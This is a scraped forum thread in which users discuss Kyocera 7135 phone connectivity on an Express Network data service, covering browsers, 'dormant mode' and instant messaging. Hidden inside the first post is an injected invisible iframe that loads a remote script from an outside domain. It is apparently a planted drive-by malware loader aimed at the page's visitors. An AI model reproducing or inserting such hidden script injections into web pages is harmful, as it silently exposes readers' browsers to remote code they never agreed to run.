+ Reply to Thread
    tcv

Some On-line related Questions...

Hey folks,

I'm having fun learning about my 7135.

I have a couple of on-line related questions. I use the Express Network and am wondering about some things.

1. What is considered to be the better web browser. Eudora and Kyocera's seem good enough, but I'm always open to a better experience.

2. Is an Express Network connection supposed to be persistent? I notice that the service will periodically disconnect between browser page loads, e-mail server checks, etc. Is this normal behavior? And what would happen if I use an app that requires persistent connectivity like AIM or IRC?

m<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

tcv
    Oh, the connection remains, but goes into "dormant mode." What the heck is that?

I mean other than what it sounds like.

m

Administrator
    basically,

dormant means you will still be abel to receive calls without having to fully disconnect from the internet. when you need to get online while in dormant mode, just go into the program you need and you are automatically connected to the site without having to sign in...

tcv
    Ah, I see.

Dormant is a little unfortunate. You can't stay connected to services like AOLIM. I have to send a message, have it time out, wait for the phone to come out of dormant mode, then resend the message.

Wish there was a way to extend the time before the phone goes into dormant mode.

I wonder what controls that...

tcv

But I don't care for dormant mode...

Yeah, dormant mode breaks connection-oriented applications like AIM, irc.

What a shame.

Anyway to tweak it?

m

Originally posted by tcv
    Ah, I see.

Dormant is a little unfortunate. You can't stay connected to services like AOLIM. I have to send a message, have it time out, wait for the phone to come out of dormant mode, then resend the message.

Wish there was a way to extend the time before the phone goes into dormant mode.

I wonder what controls that...
    I use AOLIM and ICQ all the time and never have a problem with dormant mode causing message timeouts.

You can also receive messages while dormant as long as you aren't on a voice call (your IP address is still active and listening).

Alan

Administrator

Re: But I don't care for dormant mode...

Originally posted by tcv
    Yeah, dormant mode breaks connection-oriented applications like AIM, irc.

What a shame.

Anyway to tweak it?

m
    it should not break any connections.. thats the feature of 3g. if you have verichat online and up and you are in dormant mode.. if someone sent you a message on verichat you would (should) get a sms message telling you so.. then you just open the app and go...

if you are experiencing disconnections when going in dormant mode, there is something else happeneing...

tcv
    If I load AIM and the little Led goes dark and I try to send a message to someone, I get an error about the person not being signed in. I can resend the message successfully when the LED comes back on.

This is not right?

Originally posted by tcv
    If I load AIM and the little Led goes dark and I try to send a message to someone, I get an error about the person not being signed in. I can resend the message successfully when the LED comes back on.

This is not right?
    I have never noticed this, but I typically am responding to incoming messages with AIM, not generating new outbound. ICQ works fine from dormant mode.

Alan

tcv
    I didn't notice that behavior with AIM at all today. It's been working great.

m

Originally posted by alanb
    I have never noticed this, but I typically am responding to incoming messages with AIM, not generating new outbound. ICQ works fine from dormant mode.

Alan
    Try using VeriChat by www.pdaapps.com

I have had such success with this product

The whole "dormant mode" thing has been working great for me. Yesterday I did several tests to make sure that if somebody called me while in dormant mode the call would go through (it did!) and to make sure I could immediately reconnect to an app that used data (I could!).

One thing I find a bit disturbing is that when I go to phone mode while me EN connection is active, it says 9.6 kbps. What's up with that?
    Please visit my picture site: Robert-O-Rama :)